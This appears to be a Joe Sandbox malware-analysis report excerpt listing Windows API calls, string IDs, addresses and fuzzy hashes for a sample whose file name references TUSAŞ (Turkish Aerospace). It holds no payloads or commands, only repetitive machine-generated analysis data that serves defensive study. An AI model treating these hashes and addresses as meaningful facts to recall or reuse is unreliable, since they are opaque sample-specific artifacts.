                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: __i64tow__itow__swprintf
                                                                                                                                    • String ID: %.15g$0x%p$False$True
                                                                                                                                    • API String ID: 421087845-2263619337
                                                                                                                                    • Opcode ID: aef59b864af2be1df1e5d0b5eb2698a6d6b90ec6e4d2cf60ce327233b0febb7f
                                                                                                                                    • Instruction ID: 1e4b7c554c1f4a9cb0b7b077cbd87225f7af7c60b4ad9d130356e7dff1eb3657
                                                                                                                                    • Opcode Fuzzy Hash: aef59b864af2be1df1e5d0b5eb2698a6d6b90ec6e4d2cf60ce327233b0febb7f
                                                                                                                                    • Instruction Fuzzy Hash: 8B41E6729042069FDB24DF34ED42F7A73E9EF46310F28447EE54ADB241EA759906BB10
                                                                                                                                    APIs
                                                                                                                                    • _memset.LIBCMT ref: 0102716A
                                                                                                                                    • CreateMenu.USER32 ref: 01027185
                                                                                                                                    • SetMenu.USER32(?,00000000), ref: 01027194
                                                                                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 01027221
                                                                                                                                    • IsMenu.USER32(?), ref: 01027237
                                                                                                                                    • CreatePopupMenu.USER32 ref: 01027241
                                                                                                                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0102726E
                                                                                                                                    • DrawMenuBar.USER32 ref: 01027276
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                                                                                                    • String ID: 0$F
                                                                                                                                    • API String ID: 176399719-3044882817
                                                                                                                                    • Opcode ID: b0caeb7f7dbda9b35382afc8f864f8326dd5990b6cd473a1ebd9d40fa33a624e
                                                                                                                                    • Instruction ID: a513c2f9c7270810678c9d3371271d821b276185a999d22c2c6534a47593c08b
                                                                                                                                    • Opcode Fuzzy Hash: b0caeb7f7dbda9b35382afc8f864f8326dd5990b6cd473a1ebd9d40fa33a624e
                                                                                                                                    • Instruction Fuzzy Hash: 20418974A01215EFEB20DF68D984E9ABBF5FF59340F140068FA85A7351D736A914CFA0
                                                                                                                                    APIs
                                                                                                                                    • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 0102755E
                                                                                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 01027565
                                                                                                                                    • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 01027578
                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 01027580
                                                                                                                                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 0102758B
                                                                                                                                    • DeleteDC.GDI32(00000000), ref: 01027594
                                                                                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 0102759E
                                                                                                                                    • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 010275B2
                                                                                                                                    • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 010275BE
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                                                                                    • String ID: static
                                                                                                                                    • API String ID: 2559357485-2160076837
                                                                                                                                    • Opcode ID: b4939d886d49ceb6db7ac058b96c545252ce8e30576c4b775223a0cdb860e679
                                                                                                                                    • Instruction ID: 6fd77606cb6ed328d2450e37bad15d2da4f27a3a1bd807d3003c4507db854c0d
                                                                                                                                    • Opcode Fuzzy Hash: b4939d886d49ceb6db7ac058b96c545252ce8e30576c4b775223a0cdb860e679
                                                                                                                                    • Instruction Fuzzy Hash: F4318E31100226ABDF229F64DC08FDA7BB9FF097A0F210219FA9596090C77AD811DBA4
                                                                                                                                    APIs
                                                                                                                                    • _memset.LIBCMT ref: 00FC6E3E
                                                                                                                                      • Part of subcall function 00FC8B28: __getptd_noexit.LIBCMT ref: 00FC8B28
                                                                                                                                    • __gmtime64_s.LIBCMT ref: 00FC6ED7
                                                                                                                                    • __gmtime64_s.LIBCMT ref: 00FC6F0D
                                                                                                                                    • __gmtime64_s.LIBCMT ref: 00FC6F2A
                                                                                                                                    • __allrem.LIBCMT ref: 00FC6F80
                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FC6F9C
                                                                                                                                    • __allrem.LIBCMT ref: 00FC6FB3
                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FC6FD1
                                                                                                                                    • __allrem.LIBCMT ref: 00FC6FE8
                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FC7006
                                                                                                                                    • __invoke_watson.LIBCMT ref: 00FC7077
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 384356119-0
                                                                                                                                    • Opcode ID: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                                                                                                    • Instruction ID: cac94c8c6d97800e2e071aff3711e220e0ac3d9cd1bea5adca15cea0b4c8af87
                                                                                                                                    • Opcode Fuzzy Hash: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                                                                                                    • Instruction Fuzzy Hash: F6712576E44717ABD714EE28DD43F5AB7A9AF04324F14822EF514D7281E774ED00AB90
                                                                                                                                    APIs
                                                                                                                                    • _memset.LIBCMT ref: 01002542
                                                                                                                                    • GetMenuItemInfoW.USER32(01065890,000000FF,00000000,00000030), ref: 010025A3
                                                                                                                                    • SetMenuItemInfoW.USER32(01065890,00000004,00000000,00000030), ref: 010025D9
                                                                                                                                    • Sleep.KERNEL32(000001F4), ref: 010025EB
                                                                                                                                    • GetMenuItemCount.USER32(?), ref: 0100262F
                                                                                                                                    • GetMenuItemID.USER32(?,00000000), ref: 0100264B
                                                                                                                                    • GetMenuItemID.USER32(?,-00000001), ref: 01002675
                                                                                                                                    • GetMenuItemID.USER32(?,?), ref: 010026BA
                                                                                                                                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 01002700
                                                                                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 01002714
                                                                                                                                    • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 01002735
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 4176008265-0
                                                                                                                                    • Opcode ID: 5150206706a51ccf7fec251efa57efd131ba14df1189b7810549bb6e1d9490e1
                                                                                                                                    • Instruction ID: 581622b4c28afc3b932aeed21c887cd761b34a360bbdea9bca351099c247b597
                                                                                                                                    • Opcode Fuzzy Hash: 5150206706a51ccf7fec251efa57efd131ba14df1189b7810549bb6e1d9490e1
                                                                                                                                    • Instruction Fuzzy Hash: 0861947050024AAFFB22DF68DC8CDBE7BB8FB45344F140099E982A3291D736A905DB21
                                                                                                                                    APIs
                                                                                                                                    • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 01026FA5
                                                                                                                                    • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 01026FA8
                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 01026FCC
                                                                                                                                    • _memset.LIBCMT ref: 01026FDD
                                                                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 01026FEF
                                                                                                                                    • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 01027067
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$LongWindow_memset
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 830647256-0
                                                                                                                                    • Opcode ID: a74dd94033a115203115e3a9f987ce17b3961bec496d66cd2a9210978a636f0d
                                                                                                                                    • Instruction ID: c6c8c0bc6a91702a2abda6419026c5ae09e80259ad435aba3408df78e9c5c42e
                                                                                                                                    • Opcode Fuzzy Hash: a74dd94033a115203115e3a9f987ce17b3961bec496d66cd2a9210978a636f0d
                                                                                                                                    • Instruction Fuzzy Hash: 82619F75900218EFDB21DFA8CC80EEE77F9EF09700F100199FA94AB2A1C775A945CB90
                                                                                                                                    APIs
                                                                                                                                    • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00FF6BBF
                                                                                                                                    • SafeArrayAllocData.OLEAUT32(?), ref: 00FF6C18
                                                                                                                                    • VariantInit.OLEAUT32(?), ref: 00FF6C2A
                                                                                                                                    • SafeArrayAccessData.OLEAUT32(?,?), ref: 00FF6C4A
                                                                                                                                    • VariantCopy.OLEAUT32(?,?), ref: 00FF6C9D
                                                                                                                                    • SafeArrayUnaccessData.OLEAUT32(?), ref: 00FF6CB1
                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 00FF6CC6
                                                                                                                                    • SafeArrayDestroyData.OLEAUT32(?), ref: 00FF6CD3
                                                                                                                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00FF6CDC
                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 00FF6CEE
                                                                                                                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00FF6CF9
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2706829360-0
                                                                                                                                    • Opcode ID: fea6a7ce6e44ae88c3cc589d889de1511909efce99ecd088d81f491e2162c273
                                                                                                                                    • Instruction ID: 8ae6bc7202f448265924638e9e16372a71ef7c9aae276106fcd7337c166225a2
                                                                                                                                    • Opcode Fuzzy Hash: fea6a7ce6e44ae88c3cc589d889de1511909efce99ecd088d81f491e2162c273
                                                                                                                                    • Instruction Fuzzy Hash: CB418171A0011D9FCF10DFA8D8449ADBBB9EF08351F108069FA95E7261CF75AA45DFA0
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00FA9837: __itow.LIBCMT ref: 00FA9862
                                                                                                                                      • Part of subcall function 00FA9837: __swprintf.LIBCMT ref: 00FA98AC
                                                                                                                                    • CoInitialize.OLE32 ref: 01018403
                                                                                                                                    • CoUninitialize.OLE32 ref: 0101840E
                                                                                                                                    • CoCreateInstance.OLE32(?,00000000,00000017,01032BEC,?), ref: 0101846E
                                                                                                                                    • IIDFromString.OLE32(?,?), ref: 010184E1
                                                                                                                                    • VariantInit.OLEAUT32(?), ref: 0101857B
                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 010185DC
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                                                                                    • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                                                    • API String ID: 834269672-1287834457
                                                                                                                                    • Opcode ID: 63b6634fcf72d0885f481c777358da2b7e245721b2415d556a45f793fd371d2b
                                                                                                                                    • Instruction ID: 897fc17f8cf10ec6d57a1eb8aa4b01478b0fe54be18ca88aed40e457f6cdf7ad
                                                                                                                                    • Opcode Fuzzy Hash: 63b6634fcf72d0885f481c777358da2b7e245721b2415d556a45f793fd371d2b
                                                                                                                                    • Instruction Fuzzy Hash: EE619A706083129FD711DF54C848B6EBBE8EF49754F04845EFAC29B295CB78EA44CB92
                                                                                                                                    APIs
                                                                                                                                    • WSAStartup.WSOCK32(00000101,?), ref: 01015793
                                                                                                                                    • inet_addr.WSOCK32(?,?,?), ref: 010157D8
                                                                                                                                    • gethostbyname.WSOCK32(?), ref: 010157E4
                                                                                                                                    • IcmpCreateFile.IPHLPAPI ref: 010157F2
                                                                                                                                    • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 01015862
                                                                                                                                    • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 01015878
                                                                                                                                    • IcmpCloseHandle.IPHLPAPI(00000000), ref: 010158ED
                                                                                                                                    • WSACleanup.WSOCK32 ref: 010158F3
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                                                                    • String ID: Ping
                                                                                                                                    • API String ID: 1028309954-2246546115
                                                                                                                                    • Opcode ID: da48a177ca712bb46fa627ae27ccc4ea1291c444f2bed792d6284f3fbeb77102
                                                                                                                                    • Instruction ID: d52cf19432de51dbdede2190b6320cf10555723fe682f3c8cb75efd34091e3f1
                                                                                                                                    • Opcode Fuzzy Hash: da48a177ca712bb46fa627ae27ccc4ea1291c444f2bed792d6284f3fbeb77102
                                                                                                                                    • Instruction Fuzzy Hash: 1651B1716043019FDB20DF28DC46B2ABBE4EF8A710F044569F996EB295DB78E800DB52
                                                                                                                                    APIs
                                                                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 0100B4D0
                                                                                                                                    • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0100B546
                                                                                                                                    • GetLastError.KERNEL32 ref: 0100B550
                                                                                                                                    • SetErrorMode.KERNEL32(00000000,READY), ref: 0100B5BD
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Error$Mode$DiskFreeLastSpace
                                                                                                                                    • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                                                                    • API String ID: 4194297153-14809454
                                                                                                                                    • Opcode ID: f09333af6b80af3444755e5ef2af148df39a2449ec5eb6d50dc60a482658f905
                                                                                                                                    • Instruction ID: 7b11e9badf09275f4636cd53ead672d6c1cad404faa4da42d826f5ea156d8517
                                                                                                                                    • Opcode Fuzzy Hash: f09333af6b80af3444755e5ef2af148df39a2449ec5eb6d50dc60a482658f905
                                                                                                                                    • Instruction Fuzzy Hash: 8F31A579A002059FE751DF68CC45FAE7BB4FF09301F1441AAE941EB2D1DB769901CB51
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00FA7DE1: _memmove.LIBCMT ref: 00FA7E22
                                                                                                                                      • Part of subcall function 00FFAA99: GetClassNameW.USER32(?,?,000000FF), ref: 00FFAABC
                                                                                                                                    • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00FF9014
                                                                                                                                    • GetDlgCtrlID.USER32 ref: 00FF901F
                                                                                                                                    • GetParent.USER32 ref: 00FF903B
                                                                                                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 00FF903E
                                                                                                                                    • GetDlgCtrlID.USER32(?), ref: 00FF9047
                                                                                                                                    • GetParent.USER32(?), ref: 00FF9063
                                                                                                                                    • SendMessageW.USER32(00000000,?,?,00000111), ref: 00FF9066
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                                    • API String ID: 1536045017-1403004172
                                                                                                                                    • Opcode ID: e258aa6022531639acf7694555ef7ff140cb6c338ae64681e173cd5c90b627f4
                                                                                                                                    • Instruction ID: 9c04a728a7c92de148ed8de90209ac7b5518a2db9afeb5e1a357ff38f3ef0cd8
                                                                                                                                    • Opcode Fuzzy Hash: e258aa6022531639acf7694555ef7ff140cb6c338ae64681e173cd5c90b627f4
                                                                                                                                    • Instruction Fuzzy Hash: 7C21B2B4A00109BBDF24AFB0CC85EBEBB74EF49350F100119FA61972A1DB795819EB20
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00FA7DE1: _memmove.LIBCMT ref: 00FA7E22
                                                                                                                                      • Part of subcall function 00FFAA99: GetClassNameW.USER32(?,?,000000FF), ref: 00FFAABC
                                                                                                                                    • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00FF90FD
                                                                                                                                    • GetDlgCtrlID.USER32 ref: 00FF9108
                                                                                                                                    • GetParent.USER32 ref: 00FF9124
                                                                                                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 00FF9127
                                                                                                                                    • GetDlgCtrlID.USER32(?), ref: 00FF9130
                                                                                                                                    • GetParent.USER32(?), ref: 00FF914C
                                                                                                                                    • SendMessageW.USER32(00000000,?,?,00000111), ref: 00FF914F
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                                    • API String ID: 1536045017-1403004172
                                                                                                                                    • Opcode ID: df942b168750c14fa78e23003996c72a06521ef01d033f294ea5f8ac35db0625
                                                                                                                                    • Instruction ID: 21126cf7a5dffb3d16521d806bc0b9b64cf3cc102e3921c643cee19bbd8b6567
                                                                                                                                    • Opcode Fuzzy Hash: df942b168750c14fa78e23003996c72a06521ef01d033f294ea5f8ac35db0625
                                                                                                                                    • Instruction Fuzzy Hash: D121C4B4A00109BBDF20AFA0CC89FFEBB74EF49300F100019FA51972A5DB794419EB20
                                                                                                                                    APIs
                                                                                                                                    • GetParent.USER32 ref: 00FF916F
                                                                                                                                    • GetClassNameW.USER32(00000000,?,00000100), ref: 00FF9184
                                                                                                                                    • _wcscmp.LIBCMT ref: 00FF9196
                                                                                                                                    • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00FF9211
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
